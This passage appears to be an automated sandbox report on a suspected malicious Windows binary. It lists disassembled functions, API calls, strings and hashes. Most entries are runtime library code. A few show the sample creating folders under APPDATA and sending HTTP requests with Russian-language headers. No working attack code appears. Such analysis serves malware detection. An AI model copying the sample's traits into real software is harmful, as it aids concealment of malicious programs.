Instruction Fuzzy Hash: 6F015271F48711ABE7205BB4BD09F562BD8AB49705B554032BA05E22A2DB78CC068A6C

Function 1000A001 Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 1000A045

Part of subcall function 1000C420: _free.LIBCMT ref: 1000C43D
Part of subcall function 1000C420: _free.LIBCMT ref: 1000C44F
Part of subcall function 1000C420: _free.LIBCMT ref: 1000C461
Part of subcall function 1000C420: _free.LIBCMT ref: 1000C473
Part of subcall function 1000C420: _free.LIBCMT ref: 1000C485
Part of subcall function 1000C420: _free.LIBCMT ref: 1000C497
Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4A9
Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4BB
Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4CD
Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4DF
Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4F1
Part of subcall function 1000C420: _free.LIBCMT ref: 1000C503
Part of subcall function 1000C420: _free.LIBCMT ref: 1000C515

_free.LIBCMT ref: 1000A03A

Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64

_free.LIBCMT ref: 1000A05C
_free.LIBCMT ref: 1000A071
_free.LIBCMT ref: 1000A07C
_free.LIBCMT ref: 1000A09E
_free.LIBCMT ref: 1000A0B1
_free.LIBCMT ref: 1000A0BF
_free.LIBCMT ref: 1000A0CA
_free.LIBCMT ref: 1000A102
_free.LIBCMT ref: 1000A109
_free.LIBCMT ref: 1000A126
_free.LIBCMT ref: 1000A13E

Memory Dump Source

Source File: 00000000.00000002.1950094801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1950073268.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950119045.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950143184.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_file.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 4f6d344103cf7811bd09b71d21c977f492913705ec11a3a18dac91d66e09e7eb
Instruction ID: 0af802e5104cca544d2385e0ca1ca05a391064d886f9d3a5cb5d526743884836
Opcode Fuzzy Hash: 4f6d344103cf7811bd09b71d21c977f492913705ec11a3a18dac91d66e09e7eb
Instruction Fuzzy Hash: 24315B31A002059BFB20DA34DC41B8A77E9FB423E0F114519F449E719ADE79FE908761

Function 10001CDD Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 156COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 10001CE7
SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,00000264,1000202E,?), ref: 10001D2D
CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000,?,?,00000001,00000000), ref: 10001DE9
GetLastError.KERNEL32(?,?,00000001,00000000), ref: 10001DF9
GetTempPathA.KERNEL32(00000104,?,?,?,00000001,00000000), ref: 10001E12
CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000,?,?,00000001,00000000,?,?,00000001,00000000), ref: 10001ECC
GetLastError.KERNEL32(?,?,00000001,00000000,?,?,00000001,00000000), ref: 10001ED2

Strings

APPDATA, xrefs: 10001D3F
TMPDIR, xrefs: 10001E24

Memory Dump Source

Source File: 00000000.00000002.1950094801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1950073268.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950119045.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950143184.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_file.jbxd

Similarity

API ID: CreateDirectoryErrorLastPath$FolderH_prolog3_Temp
String ID: APPDATA$TMPDIR
API String ID: 1838500112-4048745339
Opcode ID: 00851e4ded4e5e03db144df6c0333d2f877147d47fd9b3b0a9c51e3763c74205
Instruction ID: 65cc4f0b8c34a884811309b14049f09b1d2f67be4c4777eb46c939f585e6cab7
Opcode Fuzzy Hash: 00851e4ded4e5e03db144df6c0333d2f877147d47fd9b3b0a9c51e3763c74205
Instruction Fuzzy Hash: 6B515E70900259EAFB64EBA4CC89BDDB7B9EF04380F5005E9E109A6055DB74AFC4CF61

Function 100010C7 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 55networkCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 100010CE
HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001103
HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001123
HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001143
HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001163

Strings

Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 10001105
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 10001145
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 100010D9
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 10001125

Memory Dump Source

Source File: 00000000.00000002.1950094801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1950073268.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950119045.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950143184.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_file.jbxd

Similarity

API ID: HeadersHttpRequest$H_prolog3_
String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
API String ID: 1254599795-787135837
Opcode ID: 8d3d7825b2bb6dea36e27622bcd4b7ddfc44603214986a735072bca3a8471053
Instruction ID: 505ec4d7c45309835e960384523a5e30396a54de81b8e769e2ad7823f420ed9d
Opcode Fuzzy Hash: 8d3d7825b2bb6dea36e27622bcd4b7ddfc44603214986a735072bca3a8471053
Instruction Fuzzy Hash: DA119372D0010DEEEB10DBA9DC91DEEBB78EB18351FA0C019F22176051DB75AA45DBB1

Function 10006D58 Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 10006D6E

Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64

_free.LIBCMT ref: 10006D7A
_free.LIBCMT ref: 10006D85
_free.LIBCMT ref: 10006D90
_free.LIBCMT ref: 10006D9B
_free.LIBCMT ref: 10006DA6
_free.LIBCMT ref: 10006DB1
_free.LIBCMT ref: 10006DBC
_free.LIBCMT ref: 10006DC7
_free.LIBCMT ref: 10006DD5

Memory Dump Source

Source File: 00000000.00000002.1950094801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1950073268.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950119045.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950143184.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_file.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 8b6844ad3729e3fcad320fbe5a6c795a3d07021f3fe8183e596603b455261e22
Instruction ID: b25e74a844c2162c16b878e0af7aba0ae7dfb07406db983acad16b8670962f51
Opcode Fuzzy Hash: 8b6844ad3729e3fcad320fbe5a6c795a3d07021f3fe8183e596603b455261e22
Instruction Fuzzy Hash: B121EB7AA00108AFDB01DF94CC81CDD7BB9FF48290F4041A6F509AB265DB35EB45CB91

Function 0041C3CF Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 147COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,0041CECF), ref: 0041C3E8

Strings

acos, xrefs: 0041C51E
pow, xrefs: 0041C486, 0041C530, 0041C57D
log10, xrefs: 0041C42A, 0041C439
asin, xrefs: 0041C515
exp, xrefs: 0041C467, 0041C4CC
log, xrefs: 0041C445, 0041C454
sqrt, xrefs: 0041C527

Memory Dump Source

Source File: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: 15d817c9b1d0a4fbb0458c9f351412a41f7c6c9a49760990de8b925fd3443d3a
Instruction ID: a42e5d16fde1fbafe1f90c690df07fce043cce1a805407c3827f836c313506d5
Opcode Fuzzy Hash: 15d817c9b1d0a4fbb0458c9f351412a41f7c6c9a49760990de8b925fd3443d3a
Instruction Fuzzy Hash: 2D51AD7198022AEBCB108F58EE8C1FE7F72FB44304F908057D481A6654C7BC99A6CB9D

Function 0040BCFB Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 0040BE1A
___TypeMatch.LIBVCRUNTIME ref: 0040BF28
_UnwindNestedFrames.LIBCMT ref: 0040C07A
CallUnexpected.LIBVCRUNTIME ref: 0040C095

Strings

csm, xrefs: 0040BE51
csm, xrefs: 0040BD38
csm, xrefs: 0040BDA5

Memory Dump Source

Source File: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2751267872-393685449
Opcode ID: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
Instruction ID: 33f924a654f9d1b13218269df17d2698b0e91053480f28ff55db22427738ff3f
Opcode Fuzzy Hash: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
Instruction Fuzzy Hash: 38B1767180020AEFCF24DFA5C9819AEB7B5EF04314B14426BE9057B292D739EA51CFD9

Function 10004131 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 10004250
___TypeMatch.LIBVCRUNTIME ref: 1000435E
_UnwindNestedFrames.LIBCMT ref: 100044B0
CallUnexpected.LIBVCRUNTIME ref: 100044CB

Strings

csm, xrefs: 100041DB
csm, xrefs: 1000416E
csm, xrefs: 10004287

Memory Dump Source

Source File: 00000000.00000002.1950094801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1950073268.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950119045.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950143184.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_file.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2751267872-393685449
Opcode ID: c4421cf047d38b61ed069ce13853ee51e8b724bc32a0b317f19ee854d316b146
Instruction ID: 3d3d7b973083d5502e03e9704e538657a8ad6664bd6ca03923258a49de60437f
Opcode Fuzzy Hash: c4421cf047d38b61ed069ce13853ee51e8b724bc32a0b317f19ee854d316b146
Instruction Fuzzy Hash: C0B180B5C00209DFEF05DF94D881A9EBBB9FF04390F12415AF8116B21ADB31EA51CB99

Function 04A2BF62 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 04A2C081
___TypeMatch.LIBVCRUNTIME ref: 04A2C18F
_UnwindNestedFrames.LIBCMT ref: 04A2C2E1
CallUnexpected.LIBVCRUNTIME ref: 04A2C2FC

Strings

csm, xrefs: 04A2BF9F
csm, xrefs: 04A2C0B8
csm, xrefs: 04A2C00C

Memory Dump Source

Source File: 00000000.00000002.1949513985.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a20000_file.jbxd

Yara matches

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2751267872-393685449
Opcode ID: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
Instruction ID: d75cf6d305cf3c6b052968ae782129f8bf6d413a30997de55f4b28739a2c2c12
Opcode Fuzzy Hash: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
Instruction Fuzzy Hash: AFB15D71800229EFDF19DFA8CB409AEB7B5BF08324F14415AE9156B211D731FA51EFA1

Function 10008F36 Relevance: 12.2, APIs: 8, Instructions: 203COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 10008F60
_free.LIBCMT ref: 10009039
_free.LIBCMT ref: 10009066

Memory Dump Source

Source File: 00000000.00000002.1950094801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1950073268.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950119045.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950143184.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_file.jbxd

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: 95010d729c9058774f15a7cf8f5dacf6367eb285395d52ca300c8e26b156bdd9
Instruction ID: d9dcc3e5fe16bdce254290b2b7dc8605e647b21a7cac7c74f5ab9bfc5a2656b0
Opcode Fuzzy Hash: 95010d729c9058774f15a7cf8f5dacf6367eb285395d52ca300c8e26b156bdd9
Instruction Fuzzy Hash: 83510474E04246EFFB10DFB48C85A9E7BE4EF413D0F124169E95497289EB769A00CB51

Function 04A29E44 Relevance: 12.1, APIs: 8, Instructions: 51libraryloaderCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(0042D064,00000FA0,?,?,04A29E22), ref: 04A29E50
GetModuleHandleW.KERNEL32(0041FFC8,?,?,04A29E22), ref: 04A29E5B
GetModuleHandleW.KERNEL32(0042000C,?,?,04A29E22), ref: 04A29E6C
GetProcAddress.KERNEL32(00000000,00420028), ref: 04A29E7E
GetProcAddress.KERNEL32(00000000,00420044), ref: 04A29E8C
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,04A29E22), ref: 04A29EAF
RtlDeleteCriticalSection.NTDLL(0042D064), ref: 04A29ECB
CloseHandle.KERNEL32(0042D060,?,?,04A29E22), ref: 04A29EDB

Memory Dump Source

Source File: 00000000.00000002.1949513985.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a20000_file.jbxd

Yara matches

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
String ID:
API String ID: 2565136772-0
Opcode ID: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
Instruction ID: 374319b21cedb7d0154aad2f02fd2b0d8be0ed2d844560d61facdfee72e75e2b
Opcode Fuzzy Hash: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
Instruction Fuzzy Hash: 36017571F40721ABE7205BB8BD09FAB3AECAB48B15F504135F905E2161DB74D8079AAC

Function 00413E0C Relevance: 10.8, APIs: 7, Instructions: 329COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00413E92

Memory Dump Source

Source File: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 1d05eccc710d275396565a7ca4ce4cb03c32f9e64a227524f8538adb25869953
Instruction ID: 59a992c9e9a8f6180de132557df0e6155a9c37934bf91f888a5cd2673cffff64
Opcode Fuzzy Hash: 1d05eccc710d275396565a7ca4ce4cb03c32f9e64a227524f8538adb25869953
Instruction Fuzzy Hash: 11B14572900355AFDB118E25CC81BEFBFA5EF99310F144167E904AB382D3789982C7A9

Function 04A34073 Relevance: 10.8, APIs: 7, Instructions: 329COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 04A340F9

Memory Dump Source

Source File: 00000000.00000002.1949513985.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a20000_file.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: f7094994ec903abcce49a6c1a655cc9da7e5ebab3a0cb20de3e6a5e810294d9f
Instruction ID: 3c7aa2c8ef3a3ca2528bd0551ff25195ad02bce6ac88edc14d96ad767990cb6d
Opcode Fuzzy Hash: f7094994ec903abcce49a6c1a655cc9da7e5ebab3a0cb20de3e6a5e810294d9f
Instruction Fuzzy Hash: A9B12072A013A5AFEB11CFA8CC81BAEBBB5AF59315F144155F844AF281F274B901C7A0

Function 100028D6 Relevance: 10.6, APIs: 7, Instructions: 136COMMONLIBRARYCODE

Download Yara Rule

APIs

__RTC_Initialize.LIBCMT ref: 1000291D
___scrt_uninitialize_crt.LIBCMT ref: 10002937

Memory Dump Source

Source File: 00000000.00000002.1950094801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1950073268.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950119045.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950143184.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_file.jbxd

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: bcaf1c042ea0bc50edbc81b8ebd31fe72f9a2e1de53f2412ad321d30f710d584
Instruction ID: 04769ff959a67eddfc0a91c70c155494b73e6b711ec1a15a155288148215b0b0
Opcode Fuzzy Hash: bcaf1c042ea0bc50edbc81b8ebd31fe72f9a2e1de53f2412ad321d30f710d584
Instruction Fuzzy Hash: 3741F372E05229AFFB21CF68CC41BAF7BA4EB846D0F114119F84467258DB309E419BA1

Function 0040B800 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 0040B837
___except_validate_context_record.LIBVCRUNTIME ref: 0040B83F
_ValidateLocalCookies.LIBCMT ref: 0040B8C8
__IsNonwritableInCurrentImage.LIBCMT ref: 0040B8F3
_ValidateLocalCookies.LIBCMT ref: 0040B948

Strings

csm, xrefs: 0040B8DD

Memory Dump Source

Source File: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 2a817a1480194b9b32cfb7907dea545d9bb946fea234306998335fac64bc32e7
Instruction ID: 37170cc5a13740ac021db770265e436928f7f71c6dcd02e9963277d07105fea9
Opcode Fuzzy Hash: 2a817a1480194b9b32cfb7907dea545d9bb946fea234306998335fac64bc32e7
Instruction Fuzzy Hash: 5741A575A00218DBCF10DF69C884A9E7BB5EF44318F14817AE8147B3E2D7399905CBD9

Function 10003A20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 10003A57
___except_validate_context_record.LIBVCRUNTIME ref: 10003A5F
_ValidateLocalCookies.LIBCMT ref: 10003AE8
__IsNonwritableInCurrentImage.LIBCMT ref: 10003B13
_ValidateLocalCookies.LIBCMT ref: 10003B68

Strings

csm, xrefs: 10003AFD

Memory Dump Source

Source File: 00000000.00000002.1950094801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1950073268.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950119045.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950143184.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_file.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 618cc4b1c9e8ab126c58b9dfa5104022869f7905af091c597ce0ca7ba0b792b2
Instruction ID: 53213870faae5245fec6ed73a44d54790f208d332314260de239e107b7581961
Opcode Fuzzy Hash: 618cc4b1c9e8ab126c58b9dfa5104022869f7905af091c597ce0ca7ba0b792b2
Instruction Fuzzy Hash: 2A41E434A002189FDF02CF68C881A9FBBF9EF453A8F11C065E9149B356C771EA15CB91

Function 100072FC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Strings

ext-ms-, xrefs: 10007367
api-ms-, xrefs: 10007353

Memory Dump Source

Source File: 00000000.00000002.1950094801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1950073268.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950119045.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950143184.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_file.jbxd

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: cde85c6b5c8b57cdf34b7df1744eca22314f2c72a21997f039bbb8b7806936d4
Instruction ID: 4a8ea71034e84b8525c0961ad639e20c08c2bf99947945f029ec6b94e21b7784
Opcode Fuzzy Hash: cde85c6b5c8b57cdf34b7df1744eca22314f2c72a21997f039bbb8b7806936d4
Instruction Fuzzy Hash: DC219671E01321EBF722DB648C81A4E37A4FB456E0B214124ED59A7195D778EE00A6E1

Function 00413379 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00413488,004035B7,?,00000000,?,?,?,00413601,00000022,FlsSetValue,00422950,00422958,?), ref: 0041343A

Strings

ext-ms-, xrefs: 004133E4
api-ms-, xrefs: 004133D0

Memory Dump Source

Source File: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
Instruction ID: afc4e2dc9a6310a4111bfadf7e5574d8da4adc5d781dab4b07345c405b9fe202
Opcode Fuzzy Hash: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
Instruction Fuzzy Hash: 5D210531B01211EBC732DF21EC44ADB7B68AB41765B254132ED05A7391E738EE46C6D8

Function 1000C5BF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 1000C587: _free.LIBCMT ref: 1000C5AC

_free.LIBCMT ref: 1000C60D

Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64

_free.LIBCMT ref: 1000C618
_free.LIBCMT ref: 1000C623
_free.LIBCMT ref: 1000C677
_free.LIBCMT ref: 1000C682
_free.LIBCMT ref: 1000C68D
_free.LIBCMT ref: 1000C698

Memory Dump Source

Source File: 00000000.00000002.1950094801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1950073268.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950119045.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950143184.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_file.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: c4c0a627cdf80609df9843e8342f0dd46d11e13b3267d69b732be6628a16741d
Instruction ID: 1780f257e170a803287b818d598211b5e25d48ac92953e35ea001cf34306b7c8
Opcode Fuzzy Hash: c4c0a627cdf80609df9843e8342f0dd46d11e13b3267d69b732be6628a16741d
Instruction Fuzzy Hash: 25115479940B08AAF520EB70CC47FCF7B9CEF457C1F400819B29D76097DA75B6484AA1

Function 1000B6D8 Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 1000B720
__fassign.LIBCMT ref: 1000B905
__fassign.LIBCMT ref: 1000B922
WriteFile.KERNEL32(?,10009A1A,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000B96A
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 1000B9AA
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000BA52

Memory Dump Source

Source File: 00000000.00000002.1950094801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1950073268.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950119045.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950143184.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_file.jbxd

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: 32d4bb0d0fb78e9b700753294cc147154fce03c70a5209c95aaa7034331b4c1e
Instruction ID: 817bf58f8fa712ded97291eda06853010b29bdec4c6be72b636a35a8a914ce65
Opcode Fuzzy Hash: 32d4bb0d0fb78e9b700753294cc147154fce03c70a5209c95aaa7034331b4c1e
Instruction Fuzzy Hash: 9DC1CF75D006989FEB11CFE8C8809EDBBB5EF09354F28816AE855F7245D631AE42CB60

Function 0040B9C4 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0040B9BB,0040AF5F,0040A770), ref: 0040B9D2
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040B9E0
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040B9F9
SetLastError.KERNEL32(00000000,0040B9BB,0040AF5F,0040A770), ref: 0040BA4B

Memory Dump Source

Source File: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
Instruction ID: eb4c4ba290695b81d2d53517126189b774af9dd69cdf091561ca3954f11cb9c7
Opcode Fuzzy Hash: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
Instruction Fuzzy Hash: 24019E323196119EE63427B9BCC6A6B3AA5EB05779720023BF120B51E3EF7D480256CC

Function 10003DFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

